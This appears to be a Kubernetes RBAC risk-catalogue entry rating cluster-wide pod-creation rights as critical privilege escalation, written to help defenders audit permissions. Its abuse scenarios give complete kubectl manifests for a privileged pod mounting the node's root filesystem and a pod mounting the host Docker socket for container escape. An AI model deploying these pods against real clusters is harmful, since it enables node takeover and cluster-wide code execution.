Create pods cluster-wide
Elevation of Privilege
Critical
Overview
| Field | Value |
|---|---|
| ID | 1006 |
| Name | Create pods cluster-wide |
| Risk Category | Elevation of Privilege |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | core |
| Resources | pods |
| Verbs | create |
| Tags | LateralMovement Persistence PrivilegeEscalation WorkloadExecution |
Description
Allows creating new pods in any namespace across the cluster. This is highly critical as it can be used to deploy pods with elevated privileges (e.g., hostPath mounts, privileged security context), leading to node compromise, cluster-wide code execution, and establishing persistence.
Abuse Scenarios
- Create a privileged pod with hostPath access to the node’s root filesystem.
kubectl create -n <namespace> -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: privileged-attacker-pod
spec:
hostNetwork: true
hostPID: true
hostIPC: true
containers:
- name: attacker
image: busybox
command: ["/bin/sh", "-c", "sleep infinity"]
securityContext:
privileged: true
volumeMounts:
- mountPath: /host
name: host-root
volumes:
- name: host-root
hostPath:
path: /
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
- Create a pod that mounts the host’s Docker socket for container escape.
kubectl create -n <namespace> -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
name: docker-socket-pod
spec:
containers:
- name: docker-client
image: docker
command: ["/bin/sh", "-c", "sleep infinity"]
volumeMounts:
- mountPath: /var/run/docker.sock
name: docker-socket
volumes:
- name: docker-socket
hostPath:
path: /var/run/docker.sock
EOF